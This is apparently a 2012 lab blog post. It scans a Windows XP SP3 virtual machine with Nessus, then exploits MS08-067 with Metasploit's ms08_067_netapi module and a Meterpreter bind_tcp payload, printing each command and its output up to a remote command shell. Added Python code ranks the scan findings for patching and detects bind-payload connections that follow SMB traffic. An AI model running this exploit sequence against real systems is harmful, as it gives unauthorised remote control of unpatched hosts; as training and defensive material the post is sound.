
Friday, 27 January 2012

Framework Exploit


Exploiting a Windows XP Machine

A. Vulnerability Assessment

  1. Open the virtual Windows XP SP3 machine again and type ipconfig to find this Windows host's IP address.
  2. Open a terminal on the host (BackTrack) and type ifconfig to find its IP address.
  3. Open Nessus and log in.
  4. Choose the Scans menu and click Add.
  5. Enter the name, type, policy and scan targets.
  6. Download the report after the scan completes.

PLUGIN ID  #  SEVERITY                          PLUGIN NAME
---------  -  --------                          -----------
35362      1  High Severity problem(s) found    MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check)
34477      1  High Severity problem(s) found    MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check)
57608      1  Medium Severity problem(s) found  SMB Signing Disabled
26920      1  Medium Severity problem(s) found  Microsoft Windows SMB NULL Session Authentication
11011      2  Low Severity problem(s) found     Microsoft Windows SMB Service Detection
54615      1  Low Severity problem(s) found     Device Type
45590      1  Low Severity problem(s) found     Common Platform Enumeration (CPE)
35716      1  Low Severity problem(s) found     Ethernet Card Manufacturer Detection
26917      1  Low Severity problem(s) found     Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry
25220      1  Low Severity problem(s) found     TCP/IP Timestamps Supported
19506      1  Low Severity problem(s) found     Nessus Scan Information
11936      1  Low Severity problem(s) found     OS Identification
11197      1  Low Severity problem(s) found     Multiple Ethernet Driver Frame Padding Information Disclosure (Etherleak)
10884      1  Low Severity problem(s) found     Network Time Protocol (NTP) Server Detection
10785      1  Low Severity problem(s) found     Microsoft Windows SMB NativeLanManager Remote System Information Disclosure
10394      1  Low Severity problem(s) found     Microsoft Windows SMB Log In Possible
10287      1  Low Severity problem(s) found     Traceroute Information
10150      1  Low Severity problem(s) found     Windows NetBIOS / SMB Remote Host Information Disclosure
10114      1  Low Severity problem(s) found     ICMP Timestamp Request Remote Date Disclosure
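The report above is only useful to the defender once it is turned into a remediation order: the two High findings are missing Microsoft patches (the bulletin and KB number are in the plugin name), the two Medium SMB findings are configuration weaknesses fixed by policy rather than by a patch, and the Low entries are mostly informational. The Python below is an added example, not code from the original post or from Nessus; it parses the findings into records, ranks them, and pulls out the patches and SMB hardening items. The tab-separated row format is a constructed assumption for this example, not a Nessus export format.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed input (an assumed format, not a Nessus export): the rows of the
# report above, one finding per line as
#   plugin_id <TAB> count <TAB> plugin name <TAB> severity text
NESSUS_ROWS = """\
35362\t1\tMS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check)\tHigh Severity problem(s) found
34477\t1\tMS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check)\tHigh Severity problem(s) found
57608\t1\tSMB Signing Disabled\tMedium Severity problem(s) found
26920\t1\tMicrosoft Windows SMB NULL Session Authentication\tMedium Severity problem(s) found
11011\t2\tMicrosoft Windows SMB Service Detection\tLow Severity problem(s) found
54615\t1\tDevice Type\tLow Severity problem(s) found
45590\t1\tCommon Platform Enumeration (CPE)\tLow Severity problem(s) found
35716\t1\tEthernet Card Manufacturer Detection\tLow Severity problem(s) found
26917\t1\tMicrosoft Windows SMB Registry : Nessus Cannot Access the Windows Registry\tLow Severity problem(s) found
25220\t1\tTCP/IP Timestamps Supported\tLow Severity problem(s) found
19506\t1\tNessus Scan Information\tLow Severity problem(s) found
11936\t1\tOS Identification\tLow Severity problem(s) found
11197\t1\tMultiple Ethernet Driver Frame Padding Information Disclosure (Etherleak)\tLow Severity problem(s) found
10884\t1\tNetwork Time Protocol (NTP) Server Detection\tLow Severity problem(s) found
10785\t1\tMicrosoft Windows SMB NativeLanManager Remote System Information Disclosure\tLow Severity problem(s) found
10394\t1\tMicrosoft Windows SMB Log In Possible\tLow Severity problem(s) found
10287\t1\tTraceroute Information\tLow Severity problem(s) found
10150\t1\tWindows NetBIOS / SMB Remote Host Information Disclosure\tLow Severity problem(s) found
10114\t1\tICMP Timestamp Request Remote Date Disclosure\tLow Severity problem(s) found
"""

SEVERITY_RANK = {"High": 3, "Medium": 2, "Low": 1}
BULLETIN_RE = re.compile(r"\b(MS\d{2}-\d{3})\b")   # e.g. MS08-067
KB_RE = re.compile(r"\((\d{6})\)")                  # e.g. (958644)


@dataclass
class Finding:
    plugin_id: int
    count: int
    name: str
    severity: str
    bulletin: Optional[str]   # Microsoft bulletin named in the plugin, if any
    kb: Optional[str]         # KB article number named in the plugin, if any


def parse_findings(text: str) -> List[Finding]:
    """Parse the constructed tab-separated rows into Finding records."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        plugin_id, count, name, severity_text = line.split("\t")
        sev = re.match(r"(High|Medium|Low)", severity_text)
        if sev is None:
            raise ValueError(f"unrecognised severity text: {severity_text!r}")
        bulletin = BULLETIN_RE.search(name)
        kb = KB_RE.search(name)
        findings.append(Finding(int(plugin_id), int(count), name, sev.group(1),
                                bulletin.group(1) if bulletin else None,
                                kb.group(1) if kb else None))
    return findings


def prioritize(findings: List[Finding]) -> List[Finding]:
    """Highest severity first; within a severity, patchable bulletins before
    everything else, then by plugin id for a stable order."""
    return sorted(findings,
                  key=lambda f: (-SEVERITY_RANK[f.severity], f.bulletin is None, f.plugin_id))


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per severity bucket."""
    counts = {"High": 0, "Medium": 0, "Low": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts


def patch_actions(findings: List[Finding]) -> List[Tuple[str, str]]:
    """(bulletin, KB) pairs that must be applied, most urgent first."""
    return [(f.bulletin, f.kb) for f in prioritize(findings) if f.bulletin]


def smb_hardening_findings(findings: List[Finding]) -> List[str]:
    """Medium-severity SMB configuration weaknesses: fixed by policy, not a patch."""
    return [f.name for f in prioritize(findings)
            if f.severity == "Medium" and "SMB" in f.name]


if __name__ == "__main__":
    fs = parse_findings(NESSUS_ROWS)
    print(summarize(fs))
    print("patch:", patch_actions(fs))
    print("harden:", smb_hardening_findings(fs))
```

Run stand-alone it prints the severity counts, the two bulletins to patch (MS08-067 first, since that is the one the exploit section below relies on) and the two SMB settings to harden.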

B. Exploit

1. Open the console and type: msfconsole
root@BT:~# msfconsole

 _                                                      _                                                                                                                                      
/  \  / \        __                          _   __    /_/ __                                                                                                                                   
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \                                                                                                                                  
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|                                                                                                                                 
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_                                                                                                                                
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\                                                                                                                               
                                                                                                                                                                                                

       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated 14 days ago (2012.01.14)

Warning: This copy of the Metasploit Framework was last updated 14 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:

2. I search for the MS08-067 NetAPI exploit in the Framework:
msf > search ms08_067_netapi

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption

3. Having found the exploit, I select it:
msf > use windows/smb/ms08_067_netapi

4. Next, I set the payload to the Windows-based Meterpreter bind_tcp, which, if the exploit succeeds, opens a Meterpreter session between the target and the attacking machine.
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp

5. Type show targets to list the systems the module can target:
msf  exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   10  Windows 2003 SP1 Japanese (NO NX)
   11  Windows 2003 SP2 English (NO NX)
   12  Windows 2003 SP2 English (NX)
   13  Windows 2003 SP2 German (NO NX)
   14  Windows 2003 SP2 German (NX)
   15  Windows XP SP2 Arabic (NX)
   16  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   17  Windows XP SP2 Chinese - Simplified (NX)
   18  Windows XP SP2 Chinese - Traditional (NX)
   19  Windows XP SP2 Czech (NX)
   2   Windows XP SP0/SP1 Universal
   20  Windows XP SP2 Danish (NX)
   21  Windows XP SP2 German (NX)
   22  Windows XP SP2 Greek (NX)
   23  Windows XP SP2 Spanish (NX)
   24  Windows XP SP2 Finnish (NX)
   25  Windows XP SP2 French (NX)
   26  Windows XP SP2 Hebrew (NX)
   27  Windows XP SP2 Hungarian (NX)
   28  Windows XP SP2 Italian (NX)
   29  Windows XP SP2 Japanese (NX)
   3   Windows XP SP2 English (AlwaysOn NX)
   30  Windows XP SP2 Korean (NX)
   31  Windows XP SP2 Dutch (NX)
   32  Windows XP SP2 Norwegian (NX)
   33  Windows XP SP2 Polish (NX)
   34  Windows XP SP2 Portuguese - Brazilian (NX)
   35  Windows XP SP2 Portuguese (NX)
   36  Windows XP SP2 Russian (NX)
   37  Windows XP SP2 Swedish (NX)
   38  Windows XP SP2 Turkish (NX)
   39  Windows XP SP3 Arabic (NX)
   4   Windows XP SP2 English (NX)
   40  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   41  Windows XP SP3 Chinese - Simplified (NX)
   42  Windows XP SP3 Chinese - Traditional (NX)
   43  Windows XP SP3 Czech (NX)
   44  Windows XP SP3 Danish (NX)
   45  Windows XP SP3 German (NX)
   46  Windows XP SP3 Greek (NX)
   47  Windows XP SP3 Spanish (NX)
   48  Windows XP SP3 Finnish (NX)
   49  Windows XP SP3 French (NX)
   5   Windows XP SP3 English (AlwaysOn NX)
   50  Windows XP SP3 Hebrew (NX)
   51  Windows XP SP3 Hungarian (NX)
   52  Windows XP SP3 Italian (NX)
   53  Windows XP SP3 Japanese (NX)
   54  Windows XP SP3 Korean (NX)
   55  Windows XP SP3 Dutch (NX)
   56  Windows XP SP3 Norwegian (NX)
   57  Windows XP SP3 Polish (NX)
   58  Windows XP SP3 Portuguese - Brazilian (NX)
   59  Windows XP SP3 Portuguese (NX)
   6   Windows XP SP3 English (NX)
   60  Windows XP SP3 Russian (NX)
   61  Windows XP SP3 Swedish (NX)
   62  Windows XP SP3 Turkish (NX)
   63  Windows 2003 SP2 Japanese (NO NX)
   7   Windows 2003 SP0 Universal
   8   Windows 2003 SP1 English (NO NX)
   9   Windows 2003 SP1 English (NX)

6. I then set our target to Windows XP SP3 English (AlwaysOn NX):
msf  exploit(ms08_067_netapi) > set target 5
target => 5

7. I set RHOST to the IP address of our target machine, the host that is vulnerable to MS08-067:
msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101

8. Set LHOST to the IP address of the attacking machine:
msf  exploit(ms08_067_netapi) > set LHOST 192.168.56.100
LHOST => 192.168.56.100

9. Set the LPORT option, the port on which the Meterpreter session between the attacker machine and the target is established (with bind_tcp this is the port the payload listens on at the target):
msf  exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080

10. Enter show options to make sure that the options are set up correctly:
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     8080             yes       The listen port
   RHOST     192.168.56.101   no        The target address


Exploit target:

   Id  Name
   --  ----
   5   Windows XP SP3 English (AlwaysOn NX)

11. Type exploit to launch the exploit and attempt to attack the target:
msf  exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:48149 -> 192.168.56.101:8080) at 2012-01-28 01:07:04 +0700

12. Finally, type shell to drop into an interactive command shell on the target:
meterpreter > shell
Process 1172 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
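From the defender's side, the session line above is the whole story in one record: the attacker first reaches the target's SMB service on port 445 and, a few seconds later, connects to port 8080 on the same host, where the bind_tcp payload is now listening. A workstation that suddenly accepts a connection on an unexpected port right after inbound SMB traffic from the same source is a pattern worth alerting on. The Python below is an added detection example, not code from the original post or from Metasploit; the flow records are constructed to mirror the exchange above, and the list of ports a Windows XP workstation is expected to serve and the 60-second window are assumptions for this example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

# Same +0700 offset that the Meterpreter session line above carries.
TZ = timezone(timedelta(hours=7))


@dataclass(frozen=True)
class Flow:
    ts: datetime   # first packet time
    src: str       # client address
    dst: str       # server address
    dport: int     # server port


# Constructed flow records (not taken from the post): an SMB request to 445
# followed three seconds later by a connection to 8080 on the same host from the
# same source, plus a benign SMB client whose later 8080 connection is far
# outside the window.
FLOWS = [
    Flow(datetime(2012, 1, 28, 1, 7, 1, tzinfo=TZ), "192.168.56.1", "192.168.56.101", 445),
    Flow(datetime(2012, 1, 28, 1, 7, 4, tzinfo=TZ), "192.168.56.1", "192.168.56.101", 8080),
    Flow(datetime(2012, 1, 28, 1, 9, 0, tzinfo=TZ), "192.168.56.50", "192.168.56.101", 445),
    Flow(datetime(2012, 1, 28, 1, 30, 0, tzinfo=TZ), "192.168.56.50", "192.168.56.101", 8080),
]

# Assumption for this example: services a Windows XP workstation normally exposes.
EXPECTED_PORTS = {135, 139, 445}

Alert = Tuple[str, str, int, float]   # (src, dst, dport, seconds after last SMB flow)


def detect_bind_after_smb(flows: List[Flow], window: timedelta = timedelta(seconds=60)) -> List[Alert]:
    """Flag a src->dst connection to an unexpected port that follows an SMB (445)
    flow between the same pair within `window`: the bind-payload shape seen above."""
    alerts: List[Alert] = []
    last_smb: Dict[Tuple[str, str], datetime] = {}
    for f in sorted(flows, key=lambda x: x.ts):
        pair = (f.src, f.dst)
        if f.dport == 445:
            last_smb[pair] = f.ts          # remember the most recent SMB contact
        elif f.dport not in EXPECTED_PORTS:
            seen = last_smb.get(pair)
            if seen is not None and timedelta(0) <= f.ts - seen <= window:
                alerts.append((f.src, f.dst, f.dport, (f.ts - seen).total_seconds()))
    return alerts


if __name__ == "__main__":
    for src, dst, port, delay in detect_bind_after_smb(FLOWS):
        print(f"ALERT {src} -> {dst}:{port} {delay:.0f}s after SMB contact from same source")
```

The detector keys on the source/destination pair rather than on the source alone, so a busy file server's legitimate SMB clients do not raise alerts for unrelated connections elsewhere; in the constructed input only the 192.168.56.1 pair fires, because the second client's 8080 connection comes 21 minutes after its SMB flow.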

1 comment:

  1. where IG in your report? do you remember the pyramid phase? please edit your report!

    -=IS2C=-